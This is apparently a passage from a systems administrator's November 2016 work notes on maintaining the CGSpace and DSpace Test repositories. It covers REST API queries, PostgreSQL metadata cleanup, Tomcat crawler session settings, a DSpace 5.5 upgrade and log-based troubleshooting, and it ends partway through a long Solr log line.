  • Also, I ran the corrections for CRPs from earlier this week
  • +
+

2016-11-10

+
    +
  • Helping Megan Zandstra and CIAT with some questions about the REST API
  • +
  • Playing with find-by-metadata-field, this works:
  • +
+
$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}'
+
    +
  • But the results are deceiving because metadata fields can have text languages and your query must match exactly!
  • +
+
dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
+ text_value | text_lang
+------------+-----------
+ SEEDS      |
+ SEEDS      |
+ SEEDS      | en_US
+(3 rows)
+
    +
  • So basically, the text language here could be null, blank, or en_US
  • +
  • To query metadata with these properties, you can do:
  • +
+
$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
+55
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
+34
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
+
    +
  • The results (55+34=89) don’t seem to match those from the database:
  • +
+
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang is null;
+ count
+-------
+    15
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='';
+ count
+-------
+     4
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='en_US';
+ count
+-------
+    66
+
    +
  • So, querying from the API I get 55 + 34 = 89 results, but the database actually only has 85…
  • +
  • And the find-by-metadata-field endpoint doesn’t seem to have a way to get all items with the field, or a wildcard value
  • +
  • I’ll ask a question on the dspace-tech mailing list
  • +
  • And speaking of text_lang, this is interesting:
  • +
+
dspacetest=# select distinct text_lang from metadatavalue where resource_type_id=2;
+ text_lang
+-----------
+
+ ethnob
+ en
+ spa
+ EN
+ es
+ frn
+ en_
+ en_US
+
+ EN_US
+ eng
+ en_U
+ fr
+(14 rows)
+
    +
  • Generate a list of all these so I can maybe fix them in batch:
  • +
+
dspace=# \copy (select distinct text_lang, count(*) from metadatavalue where resource_type_id=2 group by text_lang order by count desc) to /tmp/text-langs.csv with csv;
+COPY 14
+
    +
  • Perhaps we need to fix them all in batch, or experiment with fixing only certain metadatavalues:
  • +
+
dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
+UPDATE 85
+
    +
  • The fix-metadata.py script I have is meant for specific metadata values, so if I want to update some text_lang values I should just do it directly in the database
  • +
  • For example, on a limited set:
  • +
+
dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value='LIVESTOCK' and text_lang='';
+UPDATE 420
+
    +
  • And assuming I want to do it for all fields:
  • +
+
dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang='';
+UPDATE 183726
+
    +
  • After that restarted Tomcat and PostgreSQL (because I’m superstitious about caches) and now I see the following in REST API query:
  • +
+
$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
+71
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
+0
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
+
    +
  • Not sure what’s going on, but Discovery shows 83 values, and database shows 85, so I’m going to reindex Discovery just in case
  • +
+

2016-11-14

+
    +
  • I applied Atmire’s suggestions to fix Listings and Reports for DSpace 5.5 and now it works
  • +
  • There were some issues with the dspace/modules/jspui/pom.xml, which is annoying because all I did was rebase our working 5.1 code on top of 5.5, meaning Atmire’s installation procedure must have changed
  • +
  • So there is apparently this Tomcat native way to limit web crawlers to one session: Crawler Session Manager
  • +
  • After adding that to server.xml bots matching the pattern in the configuration will all use ONE session, just like normal users:
  • +
+
$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Language: en-US
+Content-Type: text/html;charset=utf-8
+Date: Mon, 14 Nov 2016 19:47:29 GMT
+Server: nginx
+Set-Cookie: JSESSIONID=323694E079A53D5D024F839290EDD7E8; Path=/; Secure; HttpOnly
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Cocoon-Version: 2.2.0
+X-Robots-Tag: none
+
+$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Language: en-US
+Content-Type: text/html;charset=utf-8
+Date: Mon, 14 Nov 2016 19:47:35 GMT
+Server: nginx
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Cocoon-Version: 2.2.0
+
    +
  • The first one gets a session, and any after that — within 60 seconds — will be internally mapped to the same session by Tomcat
  • +
  • This means that when Google or Baidu slam you with tens of concurrent connections they will all map to ONE internal session, which saves RAM!
  • +
+

2016-11-15

+
    +
  • The Tomcat JVM heap looks really good after applying the Crawler Session Manager fix on DSpace Test last night:
  • +
+

Tomcat JVM heap (day) after setting up the Crawler Session Manager +Tomcat JVM heap (week) after setting up the Crawler Session Manager

+
    +
  • Seems the default regex doesn’t catch Baidu, though:
  • +
+
$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Language: en-US
+Content-Type: text/html;charset=utf-8
+Date: Tue, 15 Nov 2016 08:49:54 GMT
+Server: nginx
+Set-Cookie: JSESSIONID=131409D143E8C01DE145C50FC748256E; Path=/; Secure; HttpOnly
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Cocoon-Version: 2.2.0
+
+$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Language: en-US
+Content-Type: text/html;charset=utf-8
+Date: Tue, 15 Nov 2016 08:49:59 GMT
+Server: nginx
+Set-Cookie: JSESSIONID=F6403C084480F765ED787E41D2521903; Path=/; Secure; HttpOnly
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Cocoon-Version: 2.2.0
+
    +
  • Adding Baiduspider to the list of user agents seems to work, and the final configuration should be:
  • +
+
<!-- Crawler Session Manager Valve helps mitigate damage done by web crawlers -->
+<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
+       crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*" />
+
    +
  • Looking at the bots that were active yesterday it seems the above regex should be sufficient:
  • +
+
$ grep -o -E 'Mozilla/5\.0 \(compatible;.*\"' /var/log/nginx/access.log | sort | uniq
+Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-"
+Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "-"
+Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
+Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"
+Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "-"
+
    +
  • Neat maven trick to exclude some modules from being built:
  • +
+
$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=localhost -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2 clean package
+
    +
  • We absolutely don’t use those modules, so we shouldn’t build them in the first place
  • +
+

2016-11-17

+
    +
  • Generate a list of journal titles for Peter and Abenet to look through so we can make a controlled vocabulary out of them:
  • +
+
dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc) to /tmp/journal-titles.csv with csv;
+COPY 2515
+
    +
  • Send a message to users of the CGSpace REST API to notify them of the upcoming upgrade so they can test their apps against DSpace Test
  • +
  • Test an update of old, non-HTTPS links to the CCAFS website in CGSpace metadata:
  • +
+
dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
+UPDATE 164
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
+UPDATE 7
+
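  • As an aside, PostgreSQL’s regexp_replace only replaces the first match in each value unless the 'g' flag is passed, so a single-pass variant would look something like this (untested sketch):

dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org', 'https://ccafs.cgiar.org', 'g') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';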
    +
  • Had to run it twice to get them all, since without the 'g' flag regexp_replace only replaces the first match in each value (see the aside above)
  • +
  • Run the updates on CGSpace as well
  • +
  • Run through some collections and manually regenerate some PDF thumbnails for items from before 2016 on DSpace Test to compare with CGSpace
  • +
  • I’m debating forcing the re-generation of ALL thumbnails, since some come from DSpace 3 and 4 when the thumbnailing wasn’t as good
  • +
  • The results were very good; I think that after we upgrade to 5.5 I will do it, perhaps one community / collection at a time:
  • +
+
$ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p "ImageMagick PDF Thumbnail"
+
    +
  • In related news, I’m looking at thumbnails of thumbnails (the ones we uploaded manually before, and now DSpace’s media filter has made thumbnails of THEM):
  • +
+
dspace=# select text_value from metadatavalue where text_value like '%.jpg.jpg';
+
    +
  • I’m not sure if there’s anything we can do, actually, because we would have to remove those from the thumbnail bundles, and replace them with the regular JPGs from the content bundle, and then remove them from the assetstore…
  • +
+

2016-11-18

+
    +
  • Enable Tomcat Crawler Session Manager on CGSpace
  • +
+

2016-11-21

+
    +
  • More work on Ansible playbooks for the PostgreSQL 9.3→9.5 and Java 7→8 upgrades
  • +
  • CGSpace virtual managers meeting
  • +
  • I need to look into making the item thumbnail clickable
  • +
  • Macaroni Bros said they tested the DSpace Test (DSpace 5.5) REST API for CCAFS and WLE sites and it works as expected
  • +
+

2016-11-23

+
    +
  • Upgrade Java from 7 to 8 on CGSpace
  • +
  • I had started planning the in-place PostgreSQL 9.3→9.5 upgrade but decided that I will have to pg_dump and pg_restore when I move to the new server soon anyways, so there’s no need to upgrade the database right now
  • +
  • Chat with Carlos about CGCore and the CGSpace metadata registry
  • +
  • Dump the CGSpace metadata field registry for Carlos: https://gist.github.com/alanorth/8cbd0bb2704d4bbec78025b4742f8e70 (see the sketch at the end of this list)
  • +
  • Send some feedback to Carlos on CG Core so they can better understand how DSpace/CGSpace uses metadata
  • +
  • Notes about PostgreSQL tuning from James: https://paste.fedoraproject.org/488776/14798952/
  • +
  • Play with Creative Commons stuff in DSpace submission step
  • +
  • It seems to work but it doesn’t let you choose a version of CC (like 4.0), and we would need to customize the XMLUI item display so it doesn’t display the gross CC badges
  • +
+
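  • A sketch of one way the metadata registry dump mentioned above could be produced from PostgreSQL (the DSpace 5 registry table and column names are assumed here; the exact query behind the gist isn’t recorded):

dspace=# \copy (select msr.short_id as schema, mfr.element, mfr.qualifier, mfr.scope_note from metadatafieldregistry mfr join metadataschemaregistry msr on mfr.metadata_schema_id = msr.metadata_schema_id order by msr.short_id, mfr.element, mfr.qualifier) to /tmp/metadata-registry.csv with csv;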

2016-11-24

+
    +
  • Bizuwork was testing DSpace Test on DSpace 5.5 and noticed that the Listings and Reports module seems to be case sensitive, whereas CGSpace’s Listings and Reports isn’t (ie, a search for “orth, alan” vs “Orth, Alan” returns the same results on CGSpace, but different results on DSpace Test)
  • +
  • I have raised a ticket with Atmire
  • +
  • Looks like this issue is actually the new Listings and Reports module honoring the Solr search queries more correctly
  • +
+

2016-11-27

+
    +
  • Run system updates on DSpace Test and reboot the server
  • +
  • Deploy DSpace 5.5 on CGSpace (see the command sketch after this list): +
      +
    • maven package
    • +
    • stop tomcat
    • +
    • backup postgresql
    • +
    • run Atmire 5.5 schema deletions
    • +
    • delete the deployed spring folder
    • +
    • ant update
    • +
    • run system updates
    • +
    • reboot server
    • +
    +
  • +
  • Need to do updates for ansible infrastructure role defaults, and switch the GitHub branch to the new 5.5 one
  • +
  • Testing DSpace 5.5 on CGSpace, it seems CUA’s export as XLS works for Usage statistics, but not Content statistics
  • +
  • I will raise a bug with Atmire
  • +
+
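  • The deployment steps above, expressed as a rough command sketch (paths, the -Denv value, and the service name are assumptions; the Atmire schema deletions are site-specific SQL and not reproduced here):

$ cd ~/src/git/DSpace
$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=cgspace clean package
$ sudo service tomcat7 stop
$ pg_dump -U postgres -Fc cgspace > /tmp/cgspace-pre-5.5.dump
# run the Atmire 5.5 schema deletions here (SQL provided by Atmire)
$ rm -rf /home/cgspace.cgiar.org/config/spring   # delete the deployed spring folder (path assumed)
$ cd dspace/target/dspace-installer && ant update
$ sudo apt-get update && sudo apt-get dist-upgrade
$ sudo reboot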

2016-11-28

+
    +
  • One user says he is still getting a blank page when he logs in (just the CGSpace header, but no community list)
  • +
  • Looking at the Catalina logs I see there is some super long-running indexing process going on:
  • +
+
INFO: FrameworkServlet 'oai': initialization completed in 2600 ms
+[>                                                  ] 0% time remaining: Calculating... timestamp: 2016-11-28 03:00:18
+[>                                                  ] 0% time remaining: 11 hour(s) 57 minute(s) 46 seconds. timestamp: 2016-11-28 03:00:19
+[>                                                  ] 0% time remaining: 23 hour(s) 4 minute(s) 28 seconds. timestamp: 2016-11-28 03:00:19
+[>                                                  ] 0% time remaining: 15 hour(s) 35 minute(s) 23 seconds. timestamp: 2016-11-28 03:00:19
+[>                                                  ] 0% time remaining: 14 hour(s) 5 minute(s) 56 seconds. timestamp: 2016-11-28 03:00:19
+[>                                                  ] 0% time remaining: 11 hour(s) 23 minute(s) 49 seconds. timestamp: 2016-11-28 03:00:19
+[>                                                  ] 0% time remaining: 11 hour(s) 21 minute(s) 57 seconds. timestamp: 2016-11-28 03:00:20
+
    +
  • It says OAI, and seems to start at 3:00 AM, but I only see the filter-media cron job set to start then
  • +
  • Double checking the DSpace 5.x upgrade notes for anything I missed, or troubleshooting tips
  • +
  • Running some manual processes just in case:
  • +
+
$ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacetest.cgiar.org/config/registries/dcterms-types.xml
+$ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacetest.cgiar.org/config/registries/dublin-core-types.xml
+$ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacetest.cgiar.org/config/registries/eperson-types.xml
+$ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacetest.cgiar.org/config/registries/workflow-types.xml
+
+

2016-11-29

+
    +
  • Sisay tried deleting and re-creating Goshu’s account but he still can’t see any communities on the homepage after he logs in
  • +
  • Around the time of his login I see this in the DSpace logs:
  • +
+
2016-11-29 07:56:36,350 INFO  org.dspace.authenticate.LDAPAuthentication @ g.cherinet@cgiar.org:session_id=F628E13AB4EF2BA949198A99EFD8EBE4:ip_addr=213.55.99.121:failed_login:no DN found for user g.cherinet@cgiar.org
+2016-11-29 07:56:36,350 INFO  org.dspace.authenticate.PasswordAuthentication @ g.cherinet@cgiar.org:session_id=F628E13AB4EF2BA949198A99EFD8EBE4:ip_addr=213.55.99.121:authenticate:attempting password auth of user=g.cherinet@cgiar.org
+2016-11-29 07:56:36,352 INFO  org.dspace.app.xmlui.utils.AuthenticationUtil @ g.cherinet@cgiar.org:session_id=F628E13AB4EF2BA949198A99EFD8EBE4:ip_addr=213.55.99.121:failed_login:email=g.cherinet@cgiar.org, realm=null, result=2
+2016-11-29 07:56:36,545 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Start processing item 10568/50391 id:51744
+2016-11-29 07:56:36,545 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Processing item stats
+2016-11-29 07:56:36,583 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
+2016-11-29 07:56:36,583 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Processing item's bitstream stats
+2016-11-29 07:56:36,608 INFO  com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
+2016-11-29 07:56:36,701 INFO  org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ facets for scope, null: 23
+2016-11-29 07:56:36,747 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: Error executing query
+        at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:1618)
+        at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:1600)
+        at org.dspace.discovery.SolrServiceImpl.search(SolrServiceImpl.java:1583)
+        at org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer.performSearch(SidebarFacetsTransformer.java:165)
+        at org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer.addOptions(SidebarFacetsTransformer.java:174)
+        at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:228)
+        at sun.reflect.GeneratedMethodAccessor277.invoke(Unknown Source)
+...
+
    +
  • At about the same time in the solr log I see a super long query:
  • +
+
2016-11-29 07:56:36,734 INFO  org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=*:*&fl=dateIssued.year,handle,search.resourcetype,search.resourceid,search.uniqueid&start=0&fq=NOT(withdrawn:true)&fq=NOT(discoverable:false)&fq=dateIssued.year:[*+TO+*]&fq=read:(g0+OR+e574+OR+g0+OR+g3+OR+g9+OR+g10+OR+g14+OR+g16+OR+g18+OR+g20+OR+g23+OR+g24+OR+g2072+OR+g2074+OR+g28+OR+g2076+OR+g29+OR+g2078+OR+g2080+OR+g34+OR+g2082+OR+g2084+OR+g38+OR+g2086+OR+g2088+OR+g2091+OR+g43+OR+g2092+OR+g2093+OR+g2095+OR+g2097+OR+g50+OR+g2099+OR+g51+OR+g2103+OR+g62+OR+g65+OR+g2115+OR+g2117+OR+g2119+OR+g2121+OR+g2123+OR+g2125+OR+g77+OR+g78+OR+g79+OR+g2127+OR+g80+OR+g2129+OR+g2131+OR+g2133+OR+g2134+OR+g2135+OR+g2136+OR+g2137+OR+g2138+OR+g2139+OR+g2140+OR+g2141+OR+g2142+OR+g2148+OR+g2149+OR+g2150+OR+g2151+OR+g2152+OR+g2153+OR+g2154+OR+g2156+OR+g2165+OR+g2167+OR+g2171+OR+g2174+OR+g2175+OR+g129+OR+g2182+OR+g2186+OR+g2189+OR+g153+OR+g158+OR+g166+OR+g167+OR+g168+OR+g169+OR+g2225+OR+g179+OR+g2227+OR+g2229+OR+g183+OR+g2231+OR+g184+OR+g2233+OR+g186+OR+g2235+OR+g2237+OR+g191+OR+g192+OR+g193+OR+g202+OR+g203+OR+g204+OR+g205+OR+g207+OR+g208+OR+g218+OR+g219+OR+g222+OR+g223+OR+g230+OR+g231+OR+g238+OR+g241+OR+g244+OR+g254+OR+g255+OR+g262+OR+g265+OR+g268+OR+g269+OR+g273+OR+g276+OR+g277+OR+g279+OR+g282+OR+g2332+OR+g2335+OR+g2338+OR+g292+OR+g293+OR+g2341+OR+g296+OR+g2344+OR+g297+OR+g2347+OR+g301+OR+g2350+OR+g303+OR+g305+OR+g2356+OR+g310+OR+g311+OR+g2359+OR+g313+OR+g2362+OR+g2365+OR+g2368+OR+g321+OR+g2371+OR+g325+OR+g2374+OR+g328+OR+g2377+OR+g2380+OR+g333+OR+g2383+OR+g2386+OR+g2389+OR+g342+OR+g343+OR+g2392+OR+g345+OR+g2395+OR+g348+OR+g2398+OR+g2401+OR+g2404+OR+g2407+OR+g364+OR+g366+OR+g2425+OR+g2427+OR+g385+OR+g387+OR+g388+OR+g389+OR+g2442+OR+g395+OR+g2443+OR+g2444+OR+g401+OR+g403+OR+g405+OR+g408+OR+g2457+OR+g2458+OR+g411+OR+g2459+OR+g414+OR+g2463+OR+g417+OR+g2465+OR+g2467+OR+g421+OR+g2469+OR+g2471+OR+g424+OR+g2473+OR+g2475+OR+g2476+OR+g429+OR+g433+OR+g2481+OR+g2482+OR+g2483+OR+g443+OR+g444+OR+g445+OR+g446+OR+g448+OR+g453+OR+g455+OR+g456+OR+g457+OR+g458+OR+g459+OR+g461+OR+g462+OR+g463+OR+g464+OR+g465+OR+g467+OR+g468+OR+g469+OR+g474+OR+g476+OR+g477+OR+g480+OR+g483+OR+g484+OR+g493+OR+g496+OR+g497+OR+g498+OR+g500+OR+g502+OR+g504+OR+g505+OR+g2559+OR+g2560+OR+g513+OR+g2561+OR+g515+OR+g516+OR+g518+OR+g519+OR+g2567+OR+g520+OR+g521+OR+g522+OR+g2570+OR+g523+OR+g2571+OR+g524+OR+g525+OR+g2573+OR+g526+OR+g2574+OR+g527+OR+g528+OR+g2576+OR+g529+OR+g531+OR+g2579+OR+g533+OR+g534+OR+g2582+OR+g535+OR+g2584+OR+g538+OR+g2586+OR+g540+OR+g2588+OR+g541+OR+g543+OR+g544+OR+g545+OR+g546+OR+g548+OR+g2596+OR+g549+OR+g551+OR+g555+OR+g556+OR+g558+OR+g561+OR+g569+OR+g570+OR+g571+OR+g2619+OR+g572+OR+g2620+OR+g573+OR+g2621+OR+g2622+OR+g575+OR+g578+OR+g581+OR+g582+OR+g584+OR+g585+OR+g586+OR+g587+OR+g588+OR+g590+OR+g591+OR+g593+OR+g595+OR+g596+OR+g598+OR+g599+OR+g601+OR+g602+OR+g603+OR+g604+OR+g605+OR+g606+OR+g608+OR+g609+OR+g610+OR+g612+OR+g614+OR+g616+OR+g620+OR+g621+OR+g623+OR+g630+OR+g635+OR+g636+OR+g646+OR+g649+OR+g683+OR+g684+OR+g687+OR+g689+OR+g691+OR+g695+OR+g697+OR+g698+OR+g699+OR+g700+OR+g701+OR+g707+OR+g708+OR+g709+OR+g710+OR+g711+OR+g712+OR+g713+OR+g714+OR+g715+OR+g716+OR+g717+OR+g719+OR+g720+OR+g729+OR+g732+OR+g733+OR+g734+OR+g736+OR+g737+OR+g738+OR+g2786+OR+g752+OR+g754+OR+g2804+OR+g757+OR+g2805+OR+g2806+OR+g760+OR+g761+OR+g2810+OR+g2815+OR+g769+OR+g771+OR+g773+OR+g776+OR+g786+OR+g787+OR+g788+OR+g789+OR+g791+OR+g792+OR+g793+OR+g794+OR+g795+OR+g796+OR+g798+OR+g800+OR+g802+OR+g803+OR+g806+OR+g808+OR+g810+OR+g814+OR+g815+OR+g817+OR+g829+OR+g8
30+OR+g849+OR+g893+OR+g895+OR+g898+OR+g902+OR+g903+OR+g917+OR+g919+OR+g921+OR+g922+OR+g923+OR+g924+OR+g925+OR+g926+OR+g927+OR+g928+OR+g929+OR+g930+OR+g932+OR+g933+OR+g934+OR+g938+OR+g939+OR+g944+OR+g945+OR+g946+OR+g947+OR+g948+OR+g949+OR+g950+OR+g951+OR+g953+OR+g954+OR+g955+OR+g956+OR+g958+OR+g959+OR+g960+OR+g963+OR+g964+OR+g965+OR+g968+OR+g969+OR+g970+OR+g971+OR+g972+OR+g973+OR+g974+OR+g976+OR+g978+OR+g979+OR+g984+OR+g985+OR+g987+OR+g988+OR+g991+OR+g993+OR+g994+OR+g999+OR+g1000+OR+g1003+OR+g1005+OR+g1006+OR+g1007+OR+g1012+OR+g1013+OR+g1015+OR+g1016+OR+g1018+OR+g1023+OR+g1024+OR+g1026+OR+g1028+OR+g1030+OR+g1032+OR+g1033+OR+g1035+OR+g1036+OR+g1038+OR+g1039+OR+g1041+OR+g1042+OR+g1044+OR+g1045+OR+g1047+OR+g1048+OR+g1050+OR+g1051+OR+g1053+OR+g1054+OR+g1056+OR+g1057+OR+g1058+OR+g1059+OR+g1060+OR+g1061+OR+g1062+OR+g1063+OR+g1064+OR+g1065+OR+g1066+OR+g1068+OR+g1071+OR+g1072+OR+g1074+OR+g1075+OR+g1076+OR+g1077+OR+g1078+OR+g1080+OR+g1081+OR+g1082+OR+g1084+OR+g1085+OR+g1087+OR+g1088+OR+g1089+OR+g1090+OR+g1091+OR+g1092+OR+g1093+OR+g1094+OR+g1095+OR+g1096+OR+g1097+OR+g1106+OR+g1108+OR+g1110+OR+g1112+OR+g1114+OR+g1117+OR+g1120+OR+g1121+OR+g1126+OR+g1128+OR+g1129+OR+g1131+OR+g1136+OR+g1138+OR+g1140+OR+g1141+OR+g1143+OR+g1145+OR+g1146+OR+g1148+OR+g1152+OR+g1154+OR+g1156+OR+g1158+OR+g1159+OR+g1160+OR+g1162+OR+g1163+OR+g1165+OR+g1166+OR+g1168+OR+g1170+OR+g1172+OR+g1175+OR+g1177+OR+g1179+OR+g1181+OR+g1185+OR+g1191+OR+g1193+OR+g1197+OR+g1199+OR+g1201+OR+g1203+OR+g1204+OR+g1215+OR+g1217+OR+g1219+OR+g1221+OR+g1224+OR+g1226+OR+g1227+OR+g1228+OR+g1230+OR+g1231+OR+g1232+OR+g1233+OR+g1234+OR+g1235+OR+g1236+OR+g1237+OR+g1238+OR+g1240+OR+g1241+OR+g1242+OR+g1243+OR+g1244+OR+g1246+OR+g1248+OR+g1250+OR+g1252+OR+g1254+OR+g1256+OR+g1257+OR+g1259+OR+g1261+OR+g1263+OR+g1275+OR+g1276+OR+g1277+OR+g1278+OR+g1279+OR+g1282+OR+g1284+OR+g1288+OR+g1290+OR+g1293+OR+g1296+OR+g1297+OR+g1299+OR+g1303+OR+g1304+OR+g1306+OR+g1309+OR+g1310+OR+g1311+OR+g1312+OR+g1313+OR+g1316+OR+g1318+OR+g1320+OR+g1322+OR+g1323+OR+g1324+OR+g1325+OR+g1326+OR+g1329+OR+g1331+OR+g1347+OR+g1348+OR+g1361+OR+g1362+OR+g1363+OR+g1364+OR+g1367+OR+g1368+OR+g1369+OR+g1370+OR+g1371+OR+g1374+OR+g1376+OR+g1377+OR+g1378+OR+g1380+OR+g1381+OR+g1386+OR+g1389+OR+g1391+OR+g1392+OR+g1393+OR+g1395+OR+g1396+OR+g1397+OR+g1400+OR+g1402+OR+g1406+OR+g1408+OR+g1415+OR+g1417+OR+g1433+OR+g1435+OR+g1441+OR+g1442+OR+g1443+OR+g1444+OR+g1446+OR+g1448+OR+g1450+OR+g1451+OR+g1452+OR+g1453+OR+g1454+OR+g1456+OR+g1458+OR+g1460+OR+g1462+OR+g1464+OR+g1466+OR+g1468+OR+g1470+OR+g1471+OR+g1475+OR+g1476+OR+g1477+OR+g1478+OR+g1479+OR+g1481+OR+g1482+OR+g1483+OR+g1484+OR+g1485+OR+g1486+OR+g1487+OR+g1488+OR+g1489+OR+g1490+OR+g1491+OR+g1492+OR+g1493+OR+g1495+OR+g1497+OR+g1499+OR+g1501+OR+g1503+OR+g1504+OR+g1506+OR+g1508+OR+g1511+OR+g1512+OR+g1513+OR+g1516+OR+g1522+OR+g1535+OR+g1536+OR+g1537+OR+g1539+OR+g1540+OR+g1541+OR+g1542+OR+g1547+OR+g1549+OR+g1551+OR+g1553+OR+g1555+OR+g1557+OR+g1559+OR+g1561+OR+g1563+OR+g1565+OR+g1567+OR+g1569+OR+g1571+OR+g1573+OR+g1580+OR+g1583+OR+g1588+OR+g1590+OR+g1592+OR+g1594+OR+g1595+OR+g1596+OR+g1598+OR+g1599+OR+g1600+OR+g1601+OR+g1602+OR+g1604+OR+g1606+OR+g1610+OR+g1611+OR+g1612+OR+g1613+OR+g1616+OR+g1619+OR+g1622+OR+g1624+OR+g1625+OR+g1626+OR+g1628+OR+g1629+OR+g1631+OR+g1632+OR+g1692+OR+g1694+OR+g1695+OR+g1697+OR+g1705+OR+g1706+OR+g1707+OR+g1708+OR+g1711+OR+g1715+OR+g1717+OR+g1719+OR+g1721+OR+g1722+OR+g1723+OR+g1724+OR+g1725+OR+g1726+OR+g1727+OR+g1731+OR+g1732+OR+g1736+OR+g1737+OR+g1738+OR+g1740+OR+g1742+OR+g1743+OR+g1753+OR+g1755+OR+g1758+OR+g1759+OR+g1764+OR+g1766+OR+g1769+OR
